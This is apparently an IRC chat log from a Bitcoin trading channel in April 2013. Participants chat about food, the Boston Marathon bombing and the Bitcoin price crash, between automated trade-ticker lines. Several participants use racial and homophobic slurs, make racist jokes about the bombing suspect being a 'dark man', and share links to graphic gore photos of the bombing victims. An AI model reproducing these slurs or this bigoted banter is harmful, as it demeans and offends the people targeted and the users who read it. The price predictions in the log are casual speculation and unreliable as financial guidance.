cured, never beeen near regrigeration Apr 16 05:54:15 well the being vegan part won't kill you, the cancer you get from it will Apr 16 05:54:15 pretty much scraping maggots off it to eat Apr 16 05:54:15 :D Apr 16 05:54:16 prosciutto is deliciois Apr 16 05:54:20 delicious Apr 16 05:54:34 as is chourico Apr 16 05:54:42 no vegan options for that stuff Apr 16 05:54:45 ;;eightball is ThickAsThieves REALLY a vegan? Apr 16 05:54:45 It is possible. Apr 16 05:55:19 vegan 1 yr Apr 16 05:55:24 vegetarian 7 Apr 16 05:55:41 dub whart maggots ?! Apr 16 05:55:45 ThickAsThieves: have you seen the tofu meat replacement shitchina comes out with? Apr 16 05:55:57 not sure Apr 16 05:55:57 'vegetarian pork chops' etc Apr 16 05:56:22 they take tofu and flavour the shit out of it with nuclear waste Apr 16 05:56:30 lol Apr 16 05:56:36 hehe Apr 16 05:56:41 not the biggest tofu fan Apr 16 05:56:44 meh, tofu Apr 16 05:56:47 yes... with U235 Apr 16 05:56:47 we buy blocks sometimes Apr 16 05:56:48 tofu rules Apr 16 05:56:51 and cook ourselves Apr 16 05:57:05 yeah, me too Apr 16 05:57:07 like it firm Apr 16 05:57:07 tofu is the shit Apr 16 05:57:16 but you have to deep fry it to be eatable Apr 16 05:57:19 try using it in baking Apr 16 05:57:26 i hate baking Apr 16 05:57:33 i'm a stovetop guy Apr 16 05:57:36 My wife like tofu - show's up on the dinner table now and again Apr 16 05:57:36 like most Apr 16 05:57:50 tofu is illegal in romania. Apr 16 05:57:55 lol Apr 16 05:58:08 gf hates tofu but I sneak it in here and there Apr 16 05:58:09 also being a vegetarian, and other faggotry. Apr 16 05:58:10 the food of freedom? Apr 16 05:58:14 lol Apr 16 05:58:16 pgp: so you never really have to eat out huh ;) Apr 16 05:58:32 ? Apr 16 05:58:37 I live in NYC Apr 16 05:58:44 he eats her out like everyone else, what. Apr 16 05:58:46 your comment about tofu- Apr 16 05:58:51 lol mp got it Apr 16 05:58:56 everyone eats our his wife? Apr 16 05:59:02 ouch Apr 16 05:59:04 lol Apr 16 05:59:05 her cheese? Apr 16 05:59:05 [HAVELOCK] [KCIM] 4 @ 1.08 = 4.32 BTC [+] Apr 16 05:59:06 damn Apr 16 05:59:08 unintended misinterpretations ftw. Apr 16 05:59:12 lol Apr 16 05:59:15 lol Apr 16 05:59:41 good one Apr 16 05:59:48 72 Apr 16 05:59:52 so what's the ny-boston bombings score so far ? Apr 16 05:59:54 i lost count. Apr 16 06:00:06 [HAVELOCK] [KCIM] 2 @ 1.08 = 2.16 BTC [+] Apr 16 06:00:22 have you seen the nasty pics? Apr 16 06:00:35 there are nasty pics? Apr 16 06:00:37 NSFL: http://apina.biz/100150 Apr 16 06:00:51 i've not looked. i'll survive uninformed. Apr 16 06:01:10 might be better, yep Apr 16 06:01:19 there's a big event in jacksonville this weekend Apr 16 06:01:29 called OneSpark, with bombs in the logo... Apr 16 06:01:47 feel bad for those guys... Apr 16 06:01:49 that can't be real Apr 16 06:02:03 www.beonespark.com Apr 16 06:02:06 [HAVELOCK] [VTX] 4 @ 0.5 = 2 BTC [+] Apr 16 06:02:11 mircea_popescu: never watched a beheading vid? Apr 16 06:02:32 sure, back in 1990s Apr 16 06:02:35 I have seen that Apr 16 06:02:36 seen one seen all imo Apr 16 06:02:51 i remember watching faces of death as a kid Apr 16 06:02:56 i survived Apr 16 06:02:58 me Apr 16 06:03:00 me too Apr 16 06:03:02 boston fails it so hard, they shut down the city for lite brights, not even bother to check for bombs -_- Apr 16 06:03:06 faces of death lol Apr 16 06:03:10 staged as fuck Apr 16 06:03:25 never went back and watched as adult Apr 16 06:03:27 probly true Apr 16 06:03:32 the satanists eating girl scene LOL Apr 16 06:03:39 mostly i remember them eatying monkey brains Apr 16 06:03:45 http://imgur.com/a/riTdO/ << more nsfl pics, the link above i believe that's same guy pic #3 Apr 16 06:03:48 tapping the skull Apr 16 06:03:56 or maybe that was indian jones? Apr 16 06:03:57 not dead, grabbing leg stub though Apr 16 06:03:58 lol Apr 16 06:04:14 indiana* Apr 16 06:04:28 yeah the monkey brains thing is real Apr 16 06:05:07 boston photos are fucked up... Apr 16 06:05:31 meh, go look up some shit from whereve 'murica has started a war Apr 16 06:05:31 the dude sans leg is brutal... Apr 16 06:06:24 ok see i thought i saw all kindsa blood on the ground on the news, i was like did someone explode? Apr 16 06:06:25 heh this would be business as usual in israel Apr 16 06:06:25 Taking a beating today Apr 16 06:06:32 3 day low, btw Apr 16 06:06:47 ThickAsThieves: aljazeera thought it was a gas main explosion Apr 16 06:07:06 [MPEX] [S.MPOE] 274 @ 0.00069745 = 0.1911 BTC [-] Apr 16 06:07:08 [MPEX] [S.MPOE] 1050 @ 0.00069735 = 0.7322 BTC [-] Apr 16 06:07:10 [MPEX] [S.MPOE] 7374 @ 0.00069447 = 5.121 BTC [-] Apr 16 06:07:12 [MPEX] [S.MPOE] 3202 @ 0.0006941 = 2.2225 BTC [-] Apr 16 06:07:16 so no terrorists took responsibility yet? Apr 16 06:07:29 orkaa: Im thinking it was home grown Apr 16 06:07:44 they said something about a dark man trying to access secure area Apr 16 06:07:51 yes it was that vague Apr 16 06:08:01 inb4 gun nuts protesting 2nd ammendment shit Apr 16 06:08:03 'dark man' Apr 16 06:08:12 of course Apr 16 06:08:12 haha Apr 16 06:08:27 fuckin dark people, get ya every time Apr 16 06:08:29 africanised killer bees Apr 16 06:08:31 ThickAsThieves: yeah its like Apr 16 06:08:34 a dark skinned man Apr 16 06:08:40 with possible accent Apr 16 06:08:41 no niggers in boston Apr 16 06:08:47 wearing black hoodie and clothing Apr 16 06:08:57 SOUNDS LIKE AN AVERAGE BOSTONIAN TO ME Apr 16 06:08:59 dub: they call them haitians, they drive the taxis Apr 16 06:09:05 [HAVELOCK] [VTX] 1 @ 0.51899 BTC [+] Apr 16 06:09:09 this is what it's like in bawston Apr 16 06:09:16 dpends what part Apr 16 06:09:17 bawwstan Apr 16 06:09:30 i lived in southie and west boston, pretty different Apr 16 06:09:32 and the news WAS reporting a third bomb at the jfk library Apr 16 06:09:36 and now no one is talking about Apr 16 06:09:43 wtf happened Apr 16 06:09:44 WHHHHeeeeee Apr 16 06:09:51 plenty of nigs in murderpan Apr 16 06:09:59 Diablo-D3: like hte plane that hit the pentagon Apr 16 06:10:11 spent some time in jamaice plain too Apr 16 06:10:15 lotsa dark men there Apr 16 06:10:23 jamaica* Apr 16 06:10:24 this is why the red line is disconnected from there Apr 16 06:10:37 seen this? Apr 16 06:10:38 http://www.liveleak.com/view?i=072_1366065507 Apr 16 06:11:11 horrible Apr 16 06:11:44 dub: yeah pretty fucking much Apr 16 06:11:48 i see a coke bottle Apr 16 06:12:00 dub: fucking supernigger hijacked a cruise missile or some shit Apr 16 06:12:02 kakobrekla, it sure is dark Apr 16 06:12:07 in southie, they actually have flyers in shops for bareknuckle boxing matches, or at least they used to... Apr 16 06:12:26 hm? Apr 16 06:12:28 pics of two scrawny 20 yos Apr 16 06:12:56 haven't had a lot of time in southie, mostly back bay Apr 16 06:13:04 boston is a great city, for a city Apr 16 06:13:12 btw, poor north korea, they're off the headlines today Apr 16 06:13:16 went drinking in southie a few times, it's like full-retard boston Apr 16 06:13:21 yeah Apr 16 06:13:41 i lived on one of those alley streets Apr 16 06:14:21 rented an attic room from a single mom who smoked pot in her bathroom Apr 16 06:14:21 pretty much hated the time i was there, hate the city, hate that it shuts down pretty much at midnight, hate the people, hate the accent, yeah all pretty horrible Apr 16 06:14:37 only plus side is you can actually walk, it's pretty small Apr 16 06:14:47 commuting is a nightmare Apr 16 06:15:00 and the cold Apr 16 06:15:04 gawd Apr 16 06:15:07 rent was crazy high too Apr 16 06:15:46 like any big city Apr 16 06:16:21 uh Apr 16 06:16:30 not every big city has bad commuting Apr 16 06:16:49 boston is especially bad Apr 16 06:17:03 yes Apr 16 06:17:06 [HAVELOCK] [VTX] 3 @ 0.519 = 1.557 BTC [+] Apr 16 06:17:07 but i guess there could be worse, boston is low on my list of cities to drive in Apr 16 06:17:08 boston traffic is terrifying Apr 16 06:17:13 but it's not philly or montreal bad Apr 16 06:17:17 i would rather drive in philly Apr 16 06:17:21 at least if i had an armored car Apr 16 06:17:27 the traffic in philly is pleasant by comparison Apr 16 06:17:35 and the roads more or less are straight, not cow-paths from the 16th century Apr 16 06:17:36 [BTCTC] [ASICMINER-PT] 1 @ 0.89899 BTC [-] Apr 16 06:17:44 hehe Apr 16 06:17:44 well yeah armored car in philly is a good idea Apr 16 06:17:47 fuck using a gps unit Apr 16 06:17:55 those roads defy all logic and science Apr 16 06:18:06 [BTCTC] [S.MPOE-PT] 200 @ 0.00065 = 0.13 BTC [+] Apr 16 06:18:10 [BTCTC] [S.MPOE-PT] 142 @ 0.000689 = 0.0978 BTC [+] Apr 16 06:18:14 [BTCTC] [S.MPOE-PT] 696 @ 0.00069 = 0.4802 BTC [+] Apr 16 06:18:19 [BTCTC] [S.MPOE-PT] 129 @ 0.000691 = 0.0891 BTC [+] Apr 16 06:18:30 [BTCTC] [S.MPOE-PT] 100 @ 0.000695 = 0.0695 BTC [+] Apr 16 06:18:33 [BTCTC] [S.MPOE-PT] 182 @ 0.000697 = 0.1269 BTC [+] Apr 16 06:18:41 [BTCTC] [S.MPOE-PT] 18 @ 0.000698 = 0.0126 BTC [+] Apr 16 06:18:45 [BTCTC] [S.MPOE-PT] 704 @ 0.000698 = 0.4914 BTC [+] Apr 16 06:18:49 [BTCTC] [S.MPOE-PT] 2 @ 0.0007 = 0.0014 BTC [+] Apr 16 06:18:52 [BTCTC] [S.MPOE-PT] 394 @ 0.000709 = 0.2793 BTC [+] Apr 16 06:18:56 [BTCTC] [S.MPOE-PT] 100 @ 0.000709 = 0.0709 BTC [+] Apr 16 06:19:00 [BTCTC] [S.MPOE-PT] 100 @ 0.00071 = 0.071 BTC [+] Apr 16 06:19:04 [BTCTC] [S.MPOE-PT] 1500 @ 0.000712 = 1.068 BTC [+] Apr 16 06:19:04 just don't make the mistake of hopping into camden at night Apr 16 06:19:08 [BTCTC] [S.MPOE-PT] 588 @ 0.000714 = 0.4198 BTC [+] Apr 16 06:19:19 [BTCTC] [S.MPOE-PT] 30 @ 0.00073 = 0.0219 BTC [+] Apr 16 06:19:19 that's a city they should just burn to the ground Apr 16 06:19:23 [BTCTC] [S.MPOE-PT] 50 @ 0.000746 = 0.0373 BTC [+] Apr 16 06:19:26 [BTCTC] [S.MPOE-PT] 30 @ 0.000747 = 0.0224 BTC [+] Apr 16 06:19:31 [BTCTC] [S.MPOE-PT] 2 @ 0.00075 = 0.0015 BTC [+] Apr 16 06:20:00 easier to build a replacement Apr 16 06:20:15 hmmm this is gonna go lower faster than i thought Apr 16 06:21:27 hm, i should go to sleep Apr 16 06:21:41 i can hear the morning busses Apr 16 06:21:43 [BTCTC] [S.MPOE-PT] 80 @ 0.00079 = 0.0632 BTC [+] Apr 16 06:21:51 [BTCTC] [S.MPOE-PT] 8 @ 0.00081 = 0.0065 BTC [+] Apr 16 06:21:54 [BTCTC] [S.MPOE-PT] 41 @ 0.00081 = 0.0332 BTC [+] Apr 16 06:21:58 [BTCTC] [S.MPOE-PT] 100 @ 0.00089 = 0.089 BTC [+] Apr 16 06:22:02 [BTCTC] [S.MPOE-PT] 8 @ 0.0009 = 0.0072 BTC [+] Apr 16 06:22:06 [BTCTC] [S.MPOE-PT] 50 @ 0.00096 = 0.048 BTC [+] Apr 16 06:22:11 wat Apr 16 06:22:14 [BTCTC] [S.MPOE-PT] 8 @ 0.00097 = 0.0078 BTC [+] Apr 16 06:22:18 [BTCTC] [S.MPOE-PT] 10 @ 0.001 = 0.01 BTC [+] Apr 16 06:23:32 It might go faster than expected Apr 16 06:23:54 [MPEX] [S.DICE] 182 @ 0.00364763 = 0.6639 BTC [-] Apr 16 06:23:58 now that people see the inevitable coming up to meet them Apr 16 06:24:09 the last bubble chart is very clear Apr 16 06:24:15 people will probably try to front run it Apr 16 06:24:17 I know I did Apr 16 06:24:28 i agree Apr 16 06:24:43 also the pullback might be slightly faster Apr 16 06:25:09 i think there are a lot of people waiting for the bottom Apr 16 06:25:25 wonder how log it will last once we hit it Apr 16 06:25:29 long* Apr 16 06:25:31 [MPEX] [S.MPOE] 3312 @ 0.00071199 = 2.3581 BTC [+] Apr 16 06:26:22 [MPEX] [S.MPOE] 4970 @ 0.0006941 = 3.4497 BTC [-] Apr 16 06:26:23 [MPEX] [S.MPOE] 10330 @ 0.00069311 = 7.1598 BTC [-] Apr 16 06:27:16 remember, the psychological perspective of immediate post-pop last time was probably very similar to what we naturally are thinking now Apr 16 06:27:22 step ahead Apr 16 06:27:37 we need to think like the people 3 weeks after the pop Apr 16 06:27:58 ;;goxlag Apr 16 06:27:59 MtGox lag is 0 seconds. During this time, light travels 0.0 AU. You could have sent a bitcoin ... nowhere, really (0 AU). Apr 16 06:28:21 gox right click unfucked the lag eh Apr 16 06:28:39 Easy peasy Apr 16 06:28:53 ;;next Apr 16 06:28:53 looking for retracement to 86 | buy targets: 74, 68, 54 | resistance 85-88, upper target in case of breakout mid-90s - 100 | updated by OneFixt at Apr 16 2013, 1:44 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 1 hour, 44 minutes, and 48 seconds ago Apr 16 06:29:01 Bugpowder thats prolly somewhat true but certain conditions have changed Apr 16 06:29:14 conditions have changed Apr 16 06:29:21 is one of the reasons why its going down faster Apr 16 06:29:21 bitcoin is in a much better place Apr 16 06:29:22 so what did gox do to fix the lag Apr 16 06:29:33 of course, the valuation is 8x Apr 16 06:29:34 Or did everyone just give up? Apr 16 06:29:45 volume is extremely heavy Apr 16 06:29:49 they fixed the lag Apr 16 06:29:55 jcpham: new hardware, higher min trade, trade rate limits Apr 16 06:29:55 must have Apr 16 06:29:56 I thought so too Apr 16 06:30:18 dub oh? higher min trade and rate limits? Apr 16 06:30:20 [BTCTC] [GSDPT] 16 @ 0.00421 = 0.0674 BTC [+] Apr 16 06:30:41 Bugpowder: yeah according to that neofutur shill Apr 16 06:30:59 well new hardware didn't do shit tbh, rate limiting and putting a check to stop people bidding with empty wallets seemed to help Apr 16 06:31:02 still sucks though Apr 16 06:31:07 everything they do is crappy bandaid solutions Apr 16 06:31:28 I dont thing the balance check is in yet Apr 16 06:31:34 support has a 3 day backlog, verifications has ~2 week backlog Apr 16 06:32:06 [HAVELOCK] [VTX] 14 @ 0.519 = 7.266 BTC [+] Apr 16 06:32:22 i'm guessing they spent a good amount of money on pizza parties and don't have enough to fund all deposits Apr 16 06:32:35 luckily wire transfers out have 0 backlong Apr 16 06:32:37 backlog Apr 16 06:32:39 so it's a cycle of sweating and eating pizza Apr 16 06:32:41 [BTCTC] [ASICMINER-PT] 2 @ 0.89899 = 1.798 BTC [-] Apr 16 06:32:43 tux collection of diamond 20 sided dice Apr 16 06:32:50 lol Apr 16 06:33:04 I just bought 2500 magic cards for some used 5850s Apr 16 06:33:11 and gold leafe yugio cards Apr 16 06:33:13 dunno a friend of mine has been waiting sepa withdrawal 3 weeks now from gox Apr 16 06:33:17 i tell them it's a 50/50 on whether they will be successful or in jail in a year Apr 16 06:33:30 goes to 20/80 if you make it 3 years. Apr 16 06:33:35 wire Apr 16 06:33:39 the Apr 16 06:33:40 money Apr 16 06:33:45 [BTCTC] [ASICMINER-PT] 11 @ 0.899 = 9.889 BTC [+] Apr 16 06:33:53 sepa is a wire. Apr 16 06:33:58 is it? Apr 16 06:34:02 yeah Apr 16 06:34:03 y so slow then? Apr 16 06:34:06 cause idiocy. Apr 16 06:34:14 but basically it's faster cheaper wire. Apr 16 06:34:26 they are saying they are capped out at the polish bank iirc Apr 16 06:34:28 well they seem to have their shit together with US intl wire, at least for bofa Apr 16 06:34:32 which is bull Apr 16 06:34:48 what banks DON'T WANT you to wire them money? Apr 16 06:35:06 its a withdrawal to be nitpicky Apr 16 06:35:30 [BTCTC] [ASICMINER-PT] 4 @ 0.89998 = 3.5999 BTC [+] Apr 16 06:35:33 basically you can't initiate a sepa wire except from an european bank or subsidiary Apr 16 06:35:39 and mtgox is illegal in europe Apr 16 06:35:42 that'd be the rub. Apr 16 06:36:20 [BTCTC] [ASICMINER-PT] 9 @ 0.89999 = 8.0999 BTC [+] Apr 16 06:37:05 anyway, catch all of you tomorrow. Apr 16 06:37:21 peace Apr 16 06:38:03 this selloff is brutal Apr 16 06:38:11 dude! Apr 16 06:38:16 you are going to miss the climax Apr 16 06:38:26 Bugpowder's investment return plot Apr 16 06:38:35 (brought to you by MPEx) Apr 16 06:38:44 :D Apr 16 06:38:45 wall moved lower Apr 16 06:39:01 fuck Apr 16 06:39:10 so bug, whats 3 weeks from now Apr 16 06:39:21 kinda want to sell here and rebuy but thsi asshole is gonna trap me Apr 16 06:39:37 3 weeks from now is 40 Apr 16 06:40:00 1st guess Apr 16 06:40:07 need to think about it of course Apr 16 06:40:41 It has been shown that if you make a guess, pause, reconsider, then make a second guess, then average those two guesses, you are more accurate Apr 16 06:40:57 good info Apr 16 06:41:10 the average beats both the first or second guess, even if you have the same information Apr 16 06:42:36 I hope all my friends got out Apr 16 06:42:47 I told them all to sell this morning. Apr 16 06:43:16 dub I think there will be a bounce Apr 16 06:43:23 yeah Apr 16 06:43:30 this downward move is too violent Apr 16 06:43:32 it will be right after I sell Apr 16 06:43:36 yes Apr 16 06:43:36 lol Apr 16 06:44:03 you never want to sell after a selloff has been going for quite a while Apr 16 06:44:38 but I would exit on the next sustained up move Apr 16 06:44:58 if I still had coins Apr 16 06:45:22 (not advice) Apr 16 06:46:07 Exit permanente? Apr 16 06:46:16 looks like we'll lose 60 soon Apr 16 06:46:25 That doesn't sound fun at all Apr 16 06:46:45 yes officer, this dude named after tim leary's herion metaphore on the internet gave me trading advice Apr 16 06:46:54 heroin* Apr 16 06:47:16 I did my ten percent metal thing this morning closer to 100 Apr 16 06:47:18 *metafore Apr 16 06:47:30 Still waiting on the big bubble Apr 16 06:47:54 Diablo-D3: orly Apr 16 06:49:22 I think dub's phonetic is more Apr 16 06:49:31 well luke will be reasonably priced soon Apr 16 06:49:43 oh my Apr 16 06:49:47 kakobrekla: we're selling luke? to who? Apr 16 06:50:01 dub lol Apr 16 06:50:08 id get rid of him for free, but his coins are 25$ a pop Apr 16 06:55:47 I suspect you'd have to pay to have him taken away Apr 16 06:57:09 expecially now his loyal mouth breathing fanbase is realising what a spineless piece of shit he really is Apr 16 06:58:04 lol clarkmoody cant keep up with gox now Apr 16 06:58:20 how things have changed Apr 16 06:58:38 here comes 60 Apr 16 07:01:47 hooooly fuk Apr 16 07:01:53 BFL Shipping delayed! Avalon batch #2 shipping instead. Preorder your Avalon Batch #4 unit now from www.butterflylabs.com PREORDER NOW! Apr 16 07:02:11 [BTCTC] [CRYPTO-TRADE] 1 @ 0.15999 BTC [+] Apr 16 07:04:46 [BTCTC] [S.MPOE-PT] 42 @ 0.00085 = 0.0357 BTC [-] Apr 16 07:04:49 soooo 50 tonight? Apr 16 07:05:10 hmm Apr 16 07:05:17 time to update my bid positioning Apr 16 07:06:08 happening faster than i thought... Apr 16 07:06:20 $30 tonight? Apr 16 07:06:26 bp: what do you think? Apr 16 07:06:46 bounce off 50 Apr 16 07:06:50 or a little before Apr 16 07:07:10 ugh i had a bid up at 65 i forgot about :/ Apr 16 07:07:15 just 10btc Apr 16 07:07:35 lol Apr 16 07:08:11 guess i'll throw it into sdice or something Apr 16 07:08:50 myabe ltc Apr 16 07:09:08 nah Apr 16 07:09:11 hehe Apr 16 07:09:26 ;;bids 31 Apr 16 07:09:27 There are currently 119758.3 bitcoins demanded at or over 31.0 USD, worth 5378138.64252 USD in total. | Data vintage: 76.0023 seconds Apr 16 07:09:49 thought I was going to bed, but... not now! Apr 16 07:10:32 started nibbling... Apr 16 07:11:02 combo should really be posting funny shit on the way down too Apr 16 07:11:14 http://www.youtube.com/watch?v=s_hFTR6qyEo Apr 16 07:11:18 comboy Apr 16 07:11:54 who's got balls Apr 16 07:12:33 DRAINAAAGGGGEEEE Apr 16 07:13:28 how bout that ... new low... a little sooner than I expected, but hey... Apr 16 07:14:14 come on hit 51 Apr 16 07:14:20 ;;goxlag Apr 16 07:14:21 MtGox lag is 4.718365 seconds. During this time, light travels 0.00945555063055 AU. You could have sent a bitcoin from Saturn to its largest moon, Titan (0.00802 AU). Apr 16 07:14:41 you gonna play the bounce ? Apr 16 07:15:20 yeah if it hits my bid Apr 16 07:15:20 just did :) **** BEGIN LOGGING AT Tue Apr 16 13:59:58 2013 Apr 16 14:00:22 ThickAsThieves: 70 might be a bit rich actually… People will definitely want to buy at 50, but at 69? At 69 people are probably counting their blessings that they can sell the bounce. Apr 16 14:01:04 Bugpowder you're making the mistake of thinking "people" are like you. Apr 16 14:01:13 the vast majority of bitcvoin holders don't give a shit what the price is. Apr 16 14:01:17 I have made very few mistakes tonight Apr 16 14:01:21 actually Apr 16 14:01:32 and the vast majority are in a panic Apr 16 14:01:36 sigh. Apr 16 14:01:41 the big dogs might not be Apr 16 14:01:51 the 1% or so bitcoins that are held by noobs really don't matter in any serious discussion. Apr 16 14:02:04 are you talking people or talking total bitcoins Apr 16 14:02:09 total bitcoins. Apr 16 14:02:13 that's different Apr 16 14:02:14 this is money. people don't matter. Apr 16 14:02:16 well... Apr 16 14:02:40 half the top 500 addresses didn't move during the whole bubble Apr 16 14:02:46 I saw that somewhere Apr 16 14:02:46 exactly. Apr 16 14:02:58 buncha noobs got tjhemselves into a tizzy. nobody really caresd. Apr 16 14:03:13 but if they didn't move on the way up or the way down, they aren't participating in the market Apr 16 14:03:31 the mtgox "market" is very decoupled from economic reality, as it happens. Apr 16 14:03:35 and my goal is to make $ and coins from the price movement Apr 16 14:03:39 i don't imagine a recoupling is ever likely at any rate. Apr 16 14:03:55 i know your goal is to try and speculate, but this makes you not part of bitcoin in any meaningful sense. Apr 16 14:04:27 hence, the people that are market participants are the people I'm thinking about, since they are pushing the price around. Apr 16 14:04:43 well... Apr 16 14:05:05 Define meaningful Apr 16 14:05:07 i'd rather be profitable than be part of something in a meaningful sense. Apr 16 14:05:43 Bugpowder meaningful, as in having a price signal. you're currently unable to make any sort of judgement as to what bitcoin price should be other than "what are others thinking" Apr 16 14:05:50 thus you're not participating in price formation Apr 16 14:05:58 you're merely participating in volatility formation. Apr 16 14:06:05 deadweasel nothing wrong with that. Apr 16 14:06:16 the only problem is that it doesn't work longterm. might as well play s.dice. Apr 16 14:06:55 i agree. but for some reason this has worked out better. Apr 16 14:07:02 I think economic activity associated with bitcoin currently supports a price of ~30 Apr 16 14:07:03 well, that's the nature of chance. sometimes it works. Apr 16 14:07:12 conversely, the nature of people is to infer patterns in chance. Apr 16 14:07:13 and we will see an undershoot on that Apr 16 14:07:20 you think undershooot 30? Apr 16 14:07:22 Bugpowder ok, but you think this based on what ? Apr 16 14:07:49 based on the stability of price at around 15 pre-bubble, and the growth in bitcoin infrastructure since then Apr 16 14:07:57 see ? this is all "What others think" Apr 16 14:09:23 I'm 'adding liquidity' Apr 16 14:09:27 [MPEX] [S.MPOE] 1833 @ 0.00070824 = 1.2982 BTC [+] Apr 16 14:09:29 [MPEX] [S.MPOE] 7618 @ 0.00071 = 5.4088 BTC [+] Apr 16 14:09:46 ;;calc [ticker --vol]*[ticker --avg] Apr 16 14:09:46 let's look at this past week (dear lord, it is ONE WEEK) from a macro perspective. buncha noobs poured 20-25 mn into the fiat/btc exchanges. miners took out a few mn of that, exchanges took out a few mn out of that too as fees. Apr 16 14:09:47 37198356.7324 Apr 16 14:09:51 rest was split out back among the noobs. Apr 16 14:09:59 i bet you the EV of the bubble is < the EV of S.dice. Apr 16 14:10:02 40mn volume today Apr 16 14:10:10 for a n00b Apr 16 14:10:14 dub that's not how it works tho. Apr 16 14:10:14 sure Apr 16 14:10:24 Bugpowder well macro is macro. Apr 16 14:10:33 ;;calc [ticker --vol]*[ticker --last] Apr 16 14:10:34 34220690.9548 Apr 16 14:10:35 and from a long term EV perspective, buying at 260 is still positive Apr 16 14:10:43 lie dat? Apr 16 14:10:51 probably. if by long term one means more than a year or a few. Apr 16 14:11:04 dub most of the trades count as wash trades in this perspective. Apr 16 14:11:15 IFF you don't consider future buy in Apr 16 14:11:25 potential future buy in costs Apr 16 14:11:26 we're talking net inflows, the fact someone makes bets worth 10 btc on s.dice doesn't mean he has bet a total over 1 btc Apr 16 14:12:51 If you are ignoring volatility and bubble formation and popping, (which was obvious both during and in hindsight) then you may be making an EV positive play, but it is far far far from the best EV + play. Apr 16 14:12:51 that all sounds very positive to me Apr 16 14:13:03 KRS1 it is, kinda. Apr 16 14:13:22 Bugpowder in the end it all boils down to "it's an -ev game" and "everybody thinks they're special". Apr 16 14:13:27 wow i've learned a thing or two since i've been here Apr 16 14:13:27 sure, they are. till they aren't. Apr 16 14:13:59 I agree actually Apr 16 14:14:18 everyone does think there special Apr 16 14:14:25 when they are winning Apr 16 14:14:32 kinda how the human brain is made to work i think Apr 16 14:14:58 I maintain that luck has a huge role to play here Apr 16 14:15:03 well absolutely. Apr 16 14:15:09 hence the -ev / s.dice discussion Apr 16 14:15:23 o wow, huge iran quake. Apr 16 14:15:38 i wonder if their concrete prefab building can take it. Apr 16 14:16:02 although my brain tells my that I must be more skilled than the market Apr 16 14:16:07 7.8 15 minutes ago Apr 16 14:16:22 I wouldn't believe it if this was a mature financial market Apr 16 14:17:33 it is a bounty of information and case study for actual economical discussion however. Apr 16 14:17:48 for instance : the common wisdom is that capital controls help volatile macrofinancial situations. Apr 16 14:18:02 well... mtgox is the most extreme case of capital controls i've ever seen implemented. Apr 16 14:18:04 did not help. Apr 16 14:18:17 we actually make very few decisions with our conscious mind. our unconscious makes the decision and the consciousness creates a story around it make so it feels special about 'making' the decision. Apr 16 14:18:31 but the seductive argument is that the current state of bitcoin pricing is based on new market participants with little experience, and by using information asymmetries, like spending 12 hours a day on #bitcoin-assets, I can beat them. Apr 16 14:18:35 leaving aside the quite typical cypriot failure mode of capital controls (ie, corruption), it still doesn't work. Apr 16 14:18:45 deadweasel sorta like dreams work. Apr 16 14:19:02 so if you know a subject well enough and long enough (10,000 hours i think), the instinct can be correct when you're conciously not sure. Apr 16 14:19:16 yeah, but it's how we work ALL the time. Apr 16 14:19:18 thank you Malcom Gladwell :) Apr 16 14:19:22 Bugpowder i always suspected the "fight" or "Game" representation of markets is an artefact of the american mind and has nothing to do with market reality. Apr 16 14:19:23 lol Apr 16 14:19:30 Bugpowder: you got me. Apr 16 14:19:33 :D Apr 16 14:19:37 i'm Malcom Gladwell. Apr 16 14:20:01 also consider that the market price is manifesting itself from people doing what they think other people think people are doing Apr 16 14:20:02 I wonder how that guy that quit his job to play 10000 hours of golf is doing. Apr 16 14:20:30 he's probably very relaxed. Apr 16 14:20:33 a map has been provided in the bubble chart Apr 16 14:20:41 we're just following/leading it Apr 16 14:20:41 sounds like torture Apr 16 14:20:57 work now, sign on in a bit. Apr 16 14:21:30 ThickAsThieves: I would argue though that the dynamics of bubble formation and popping have such similarities that there must be common stages of collective emotion that drive them Apr 16 14:21:46 at this point how do you separate that Apr 16 14:21:54 now we think all bubbles are alike Apr 16 14:21:57 Bugpowder we have, of course, newton's famous quote. Apr 16 14:21:59 well anyone can draw a plot Apr 16 14:22:10 and label it with descriptors of emotion Apr 16 14:22:14 doesn't make it right Apr 16 14:22:23 right but knowing what a bubble looks like, allows us to construct it Apr 16 14:22:30 not really. Apr 16 14:22:30 but there IS something there. Apr 16 14:22:39 this is like saying knowing what democracy looks like we can now construct it. Apr 16 14:22:42 mircea_popescu: quote? Apr 16 14:22:45 nah Apr 16 14:22:52 1. we don't really know what it looks like ; 2 we've never constructed it. Apr 16 14:22:58 i dont mean it an intentional way Apr 16 14:23:10 i mean our behavior facilitates it Apr 16 14:23:11 maybe democracy is harder to construct than a spec bubble Apr 16 14:23:32 takes higher order thinking, reasoning debate Apr 16 14:23:49 bubbles are just raw emotion driven asset valuation Apr 16 14:23:51 the speculators note that when i bubble pops, this and that happens, making it much more confident behaior Apr 16 14:24:21 ThickAsThieves: I certainly have used the last bitcoin bubble chart to inform my position for this one. Apr 16 14:24:30 it went better than expected Apr 16 14:24:32 thus you are also manifesting it Apr 16 14:24:36 right Apr 16 14:24:45 my point Apr 16 14:25:03 sure Apr 16 14:25:07 we all sat here waiting for 50 Apr 16 14:25:10 obv it had to come Apr 16 14:25:16 just, when you personally manifest it, be early :) Apr 16 14:25:17 Bugpowder "I can calculate the motions of the heavenly bodies, but not the madness of people." Apr 16 14:25:22 ah yes Apr 16 14:25:36 and something being simple does not make it easy. Apr 16 14:25:43 need Dr. Selden for that Apr 16 14:25:53 such as, airplanes were made in the 1900s. ants are still not made. Apr 16 14:25:58 Seldon Apr 16 14:25:58 i do think we'll strike an anomaly against the bubble template Apr 16 14:26:29 as bitcoin is still bitcoin, unique Apr 16 14:26:36 ThickAsThieves to put it simply : the more close to common thought you are, the less likely it is to be correct. the further out you are the higher chances for you to be wrong. this is how thinking about bubbles works. Apr 16 14:26:44 [BTCTC] [ASICMINER-PT] 1 @ 0.95 BTC [+] Apr 16 14:26:47 [BTCTC] [ASICMINER-PT] 3 @ 0.95 = 2.85 BTC [+] Apr 16 14:26:49 also '' Men, it has been well said, think in herds; it will be seen that they go mad in herds, while they only recover their senses slowly, and one by one. ,, Apr 16 14:27:29 however this line thinking is actually useless to quantify bubless, because you can get the shape right Apr 16 14:27:32 but never the timescale :( Apr 16 14:28:40 ;;seen smickles Apr 16 14:28:41 smickles was last seen in #bitcoin-assets 1 week, 4 days, 19 hours, 46 minutes, and 7 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 16 14:28:56 ezdiy: yup, that's why 